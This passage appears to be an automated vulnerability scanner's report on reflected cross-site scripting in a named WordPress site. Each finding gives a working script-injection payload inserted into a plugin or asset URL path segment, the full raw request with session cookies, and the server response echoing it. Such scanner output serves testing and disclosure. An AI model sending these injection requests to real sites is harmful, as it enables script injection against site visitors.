GET /wp-content/pluginsdb61d"><script>alert(1)</script>79fc3cacd0a/shashin/display/shashin.css?ver=2.6.3 HTTP/1.1 Host: www.vogel-nest.de Proxy-Connection: keep-alive Referer: http://www.vogel-nest.de/wiki88b4a%22%3E%3Cscript%3Ealert(1)%3C/script%3Ed4f14d53e5d/Main/ImageSnap Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=hjfq1e50o6i5niqqk10hhbos05
Response
HTTP/1.1 404 Not Found Date: Wed, 09 Feb 2011 13:22:33 GMT Server: Apache/2.2.3 (CentOS) X-Pingback: http://www.vogel-nest.de/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Last-Modified: Wed, 09 Feb 2011 13:22:34 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 18926
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23cfd"><script>alert(1)</script>348f764e2cb was submitted in the REST URL parameter 3. This input was echoed as 23cfd\"><script>alert(1)</script>348f764e2cb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins/shashin23cfd"><script>alert(1)</script>348f764e2cb/display/shashin.css?ver=2.6.3 HTTP/1.1 Host: www.vogel-nest.de Proxy-Connection: keep-alive Referer: http://www.vogel-nest.de/wiki88b4a%22%3E%3Cscript%3Ealert(1)%3C/script%3Ed4f14d53e5d/Main/ImageSnap Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=hjfq1e50o6i5niqqk10hhbos05
Response
HTTP/1.1 404 Not Found Date: Wed, 09 Feb 2011 13:22:54 GMT Server: Apache/2.2.3 (CentOS) X-Pingback: http://www.vogel-nest.de/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Last-Modified: Wed, 09 Feb 2011 13:22:55 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 18927
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5834f"><script>alert(1)</script>ef4c6c05b06 was submitted in the REST URL parameter 4. This input was echoed as 5834f\"><script>alert(1)</script>ef4c6c05b06 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins/shashin/display5834f"><script>alert(1)</script>ef4c6c05b06/shashin.css?ver=2.6.3 HTTP/1.1 Host: www.vogel-nest.de Proxy-Connection: keep-alive Referer: http://www.vogel-nest.de/wiki88b4a%22%3E%3Cscript%3Ealert(1)%3C/script%3Ed4f14d53e5d/Main/ImageSnap Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=hjfq1e50o6i5niqqk10hhbos05
Response
HTTP/1.1 404 Not Found Date: Wed, 09 Feb 2011 13:23:23 GMT Server: Apache/2.2.3 (CentOS) X-Pingback: http://www.vogel-nest.de/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Last-Modified: Wed, 09 Feb 2011 13:23:24 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 18926
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47855"><script>alert(1)</script>58e885fcf40 was submitted in the REST URL parameter 5. This input was echoed as 47855\"><script>alert(1)</script>58e885fcf40 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins/shashin/display/shashin.css47855"><script>alert(1)</script>58e885fcf40?ver=2.6.3 HTTP/1.1 Host: www.vogel-nest.de Proxy-Connection: keep-alive Referer: http://www.vogel-nest.de/wiki88b4a%22%3E%3Cscript%3Ealert(1)%3C/script%3Ed4f14d53e5d/Main/ImageSnap Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=hjfq1e50o6i5niqqk10hhbos05
Response
HTTP/1.1 404 Not Found Date: Wed, 09 Feb 2011 13:23:34 GMT Server: Apache/2.2.3 (CentOS) X-Pingback: http://www.vogel-nest.de/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Last-Modified: Wed, 09 Feb 2011 13:23:34 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 18926
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 759fd"><script>alert(1)</script>3db32673c79 was submitted in the REST URL parameter 1. This input was echoed as 759fd\"><script>alert(1)</script>3db32673c79 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content759fd"><script>alert(1)</script>3db32673c79/plugins/sociable/sociable.css?ver=3.0.5 HTTP/1.1 Host: www.vogel-nest.de Proxy-Connection: keep-alive Referer: http://www.vogel-nest.de/wiki88b4a%22%3E%3Cscript%3Ealert(1)%3C/script%3Ed4f14d53e5d/Main/ImageSnap Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=hjfq1e50o6i5niqqk10hhbos05
Response
HTTP/1.1 404 Not Found Date: Wed, 09 Feb 2011 13:22:05 GMT Server: Apache/2.2.3 (CentOS) X-Pingback: http://www.vogel-nest.de/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Last-Modified: Wed, 09 Feb 2011 13:22:07 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 18914
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f465"><script>alert(1)</script>aa14411e2c9 was submitted in the REST URL parameter 2. This input was echoed as 5f465\"><script>alert(1)</script>aa14411e2c9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins5f465"><script>alert(1)</script>aa14411e2c9/sociable/sociable.css?ver=3.0.5 HTTP/1.1 Host: www.vogel-nest.de Proxy-Connection: keep-alive Referer: http://www.vogel-nest.de/wiki88b4a%22%3E%3Cscript%3Ealert(1)%3C/script%3Ed4f14d53e5d/Main/ImageSnap Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=hjfq1e50o6i5niqqk10hhbos05
Response
HTTP/1.1 404 Not Found Date: Wed, 09 Feb 2011 13:22:35 GMT Server: Apache/2.2.3 (CentOS) X-Pingback: http://www.vogel-nest.de/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Last-Modified: Wed, 09 Feb 2011 13:22:36 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 18914
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f198"><script>alert(1)</script>7b3633d48 was submitted in the REST URL parameter 3. This input was echoed as 2f198\"><script>alert(1)</script>7b3633d48 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins/sociable2f198"><script>alert(1)</script>7b3633d48/sociable.css?ver=3.0.5 HTTP/1.1 Host: www.vogel-nest.de Proxy-Connection: keep-alive Referer: http://www.vogel-nest.de/wiki88b4a%22%3E%3Cscript%3Ealert(1)%3C/script%3Ed4f14d53e5d/Main/ImageSnap Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=hjfq1e50o6i5niqqk10hhbos05
Response
HTTP/1.1 404 Not Found Date: Wed, 09 Feb 2011 13:23:03 GMT Server: Apache/2.2.3 (CentOS) X-Pingback: http://www.vogel-nest.de/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Last-Modified: Wed, 09 Feb 2011 13:23:04 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 18910
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b943a"><script>alert(1)</script>8f26ed15308 was submitted in the REST URL parameter 4. This input was echoed as b943a\"><script>alert(1)</script>8f26ed15308 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins/sociable/sociable.cssb943a"><script>alert(1)</script>8f26ed15308?ver=3.0.5 HTTP/1.1 Host: www.vogel-nest.de Proxy-Connection: keep-alive Referer: http://www.vogel-nest.de/wiki88b4a%22%3E%3Cscript%3Ealert(1)%3C/script%3Ed4f14d53e5d/Main/ImageSnap Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=hjfq1e50o6i5niqqk10hhbos05
Response
HTTP/1.1 404 Not Found Date: Wed, 09 Feb 2011 13:23:21 GMT Server: Apache/2.2.3 (CentOS) X-Pingback: http://www.vogel-nest.de/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Last-Modified: Wed, 09 Feb 2011 13:23:22 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 18914
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e0a3"><script>alert(1)</script>6931c2f9ff9 was submitted in the REST URL parameter 1. This input was echoed as 2e0a3\"><script>alert(1)</script>6931c2f9ff9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content2e0a3"><script>alert(1)</script>6931c2f9ff9/plugins/wp-highlightjs/highlight.pack.js HTTP/1.1 Host: www.vogel-nest.de Proxy-Connection: keep-alive Referer: http://www.vogel-nest.de/wiki88b4a%22%3E%3Cscript%3Ealert(1)%3C/script%3Ed4f14d53e5d/Main/ImageSnap Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=hjfq1e50o6i5niqqk10hhbos05
Response
HTTP/1.1 404 Not Found Date: Wed, 09 Feb 2011 13:21:58 GMT Server: Apache/2.2.3 (CentOS) X-Pingback: http://www.vogel-nest.de/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Last-Modified: Wed, 09 Feb 2011 13:21:58 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 18916
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91ac7"><script>alert(1)</script>576fd9b1a50 was submitted in the REST URL parameter 2. This input was echoed as 91ac7\"><script>alert(1)</script>576fd9b1a50 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins91ac7"><script>alert(1)</script>576fd9b1a50/wp-highlightjs/highlight.pack.js HTTP/1.1 Host: www.vogel-nest.de Proxy-Connection: keep-alive Referer: http://www.vogel-nest.de/wiki88b4a%22%3E%3Cscript%3Ealert(1)%3C/script%3Ed4f14d53e5d/Main/ImageSnap Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=hjfq1e50o6i5niqqk10hhbos05
Response
HTTP/1.1 404 Not Found Date: Wed, 09 Feb 2011 13:22:27 GMT Server: Apache/2.2.3 (CentOS) X-Pingback: http://www.vogel-nest.de/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Last-Modified: Wed, 09 Feb 2011 13:22:29 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 18916
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 307e3"><script>alert(1)</script>cdeeff6c558 was submitted in the REST URL parameter 3. This input was echoed as 307e3\"><script>alert(1)</script>cdeeff6c558 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins/wp-highlightjs307e3"><script>alert(1)</script>cdeeff6c558/highlight.pack.js HTTP/1.1 Host: www.vogel-nest.de Proxy-Connection: keep-alive Referer: http://www.vogel-nest.de/wiki88b4a%22%3E%3Cscript%3Ealert(1)%3C/script%3Ed4f14d53e5d/Main/ImageSnap Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=hjfq1e50o6i5niqqk10hhbos05
Response
HTTP/1.1 404 Not Found Date: Wed, 09 Feb 2011 13:22:56 GMT Server: Apache/2.2.3 (CentOS) X-Pingback: http://www.vogel-nest.de/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Last-Modified: Wed, 09 Feb 2011 13:22:56 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 18916
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c888d"><script>alert(1)</script>3c91f0bd90b was submitted in the REST URL parameter 4. This input was echoed as c888d\"><script>alert(1)</script>3c91f0bd90b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins/wp-highlightjs/highlight.pack.jsc888d"><script>alert(1)</script>3c91f0bd90b HTTP/1.1 Host: www.vogel-nest.de Proxy-Connection: keep-alive Referer: http://www.vogel-nest.de/wiki88b4a%22%3E%3Cscript%3Ealert(1)%3C/script%3Ed4f14d53e5d/Main/ImageSnap Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=hjfq1e50o6i5niqqk10hhbos05
Response
HTTP/1.1 404 Not Found Date: Wed, 09 Feb 2011 13:23:13 GMT Server: Apache/2.2.3 (CentOS) X-Pingback: http://www.vogel-nest.de/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Last-Modified: Wed, 09 Feb 2011 13:23:14 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 18916
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 670ba"><script>alert(1)</script>cc1957b54a8 was submitted in the REST URL parameter 1. This input was echoed as 670ba\"><script>alert(1)</script>cc1957b54a8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content670ba"><script>alert(1)</script>cc1957b54a8/plugins/wpaudio-mp3-player/wpaudio.min.js?ver=3.1 HTTP/1.1 Host: www.vogel-nest.de Proxy-Connection: keep-alive Referer: http://www.vogel-nest.de/wiki88b4a%22%3E%3Cscript%3Ealert(1)%3C/script%3Ed4f14d53e5d/Main/ImageSnap Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=hjfq1e50o6i5niqqk10hhbos05; __utmz=176138661.1297257723.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __utma=176138661.2034632851.1297257723.1297257723.1297257723.1; __utmc=176138661; __utmb=176138661.1.10.1297257723
Response
HTTP/1.1 404 Not Found Date: Wed, 09 Feb 2011 13:22:02 GMT Server: Apache/2.2.3 (CentOS) X-Pingback: http://www.vogel-nest.de/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Last-Modified: Wed, 09 Feb 2011 13:22:03 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 18934
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14060"><script>alert(1)</script>cea5db1e27a was submitted in the REST URL parameter 2. This input was echoed as 14060\"><script>alert(1)</script>cea5db1e27a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins14060"><script>alert(1)</script>cea5db1e27a/wpaudio-mp3-player/wpaudio.min.js?ver=3.1 HTTP/1.1 Host: www.vogel-nest.de Proxy-Connection: keep-alive Referer: http://www.vogel-nest.de/wiki88b4a%22%3E%3Cscript%3Ealert(1)%3C/script%3Ed4f14d53e5d/Main/ImageSnap Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=hjfq1e50o6i5niqqk10hhbos05; __utmz=176138661.1297257723.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __utma=176138661.2034632851.1297257723.1297257723.1297257723.1; __utmc=176138661; __utmb=176138661.1.10.1297257723
Response
HTTP/1.1 404 Not Found Date: Wed, 09 Feb 2011 13:22:25 GMT Server: Apache/2.2.3 (CentOS) X-Pingback: http://www.vogel-nest.de/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Last-Modified: Wed, 09 Feb 2011 13:22:27 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 18934
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d33c"><script>alert(1)</script>d392e819a7c was submitted in the REST URL parameter 3. This input was echoed as 4d33c\"><script>alert(1)</script>d392e819a7c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins/wpaudio-mp3-player4d33c"><script>alert(1)</script>d392e819a7c/wpaudio.min.js?ver=3.1 HTTP/1.1 Host: www.vogel-nest.de Proxy-Connection: keep-alive Referer: http://www.vogel-nest.de/wiki88b4a%22%3E%3Cscript%3Ealert(1)%3C/script%3Ed4f14d53e5d/Main/ImageSnap Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=hjfq1e50o6i5niqqk10hhbos05; __utmz=176138661.1297257723.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __utma=176138661.2034632851.1297257723.1297257723.1297257723.1; __utmc=176138661; __utmb=176138661.1.10.1297257723
Response
HTTP/1.1 404 Not Found Date: Wed, 09 Feb 2011 13:22:54 GMT Server: Apache/2.2.3 (CentOS) X-Pingback: http://www.vogel-nest.de/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Last-Modified: Wed, 09 Feb 2011 13:22:55 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 18934
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a4dc"><script>alert(1)</script>923c4ba73b8 was submitted in the REST URL parameter 4. This input was echoed as 9a4dc\"><script>alert(1)</script>923c4ba73b8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins/wpaudio-mp3-player/wpaudio.min.js9a4dc"><script>alert(1)</script>923c4ba73b8?ver=3.1 HTTP/1.1 Host: www.vogel-nest.de Proxy-Connection: keep-alive Referer: http://www.vogel-nest.de/wiki88b4a%22%3E%3Cscript%3Ealert(1)%3C/script%3Ed4f14d53e5d/Main/ImageSnap Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=hjfq1e50o6i5niqqk10hhbos05; __utmz=176138661.1297257723.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __utma=176138661.2034632851.1297257723.1297257723.1297257723.1; __utmc=176138661; __utmb=176138661.1.10.1297257723
Response
HTTP/1.1 404 Not Found Date: Wed, 09 Feb 2011 13:23:18 GMT Server: Apache/2.2.3 (CentOS) X-Pingback: http://www.vogel-nest.de/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Last-Modified: Wed, 09 Feb 2011 13:23:18 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 18934
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44e80"><script>alert(1)</script>bd855664e4a was submitted in the REST URL parameter 1. This input was echoed as 44e80\"><script>alert(1)</script>bd855664e4a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-includes44e80"><script>alert(1)</script>bd855664e4a/js/jquery/jquery.js?ver=1.4.2 HTTP/1.1 Host: www.vogel-nest.de Proxy-Connection: keep-alive Referer: http://www.vogel-nest.de/wiki88b4a%22%3E%3Cscript%3Ealert(1)%3C/script%3Ed4f14d53e5d/Main/ImageSnap Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=hjfq1e50o6i5niqqk10hhbos05
Response
HTTP/1.1 404 Not Found Date: Wed, 09 Feb 2011 13:22:16 GMT Server: Apache/2.2.3 (CentOS) X-Pingback: http://www.vogel-nest.de/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Last-Modified: Wed, 09 Feb 2011 13:22:18 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 18896
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
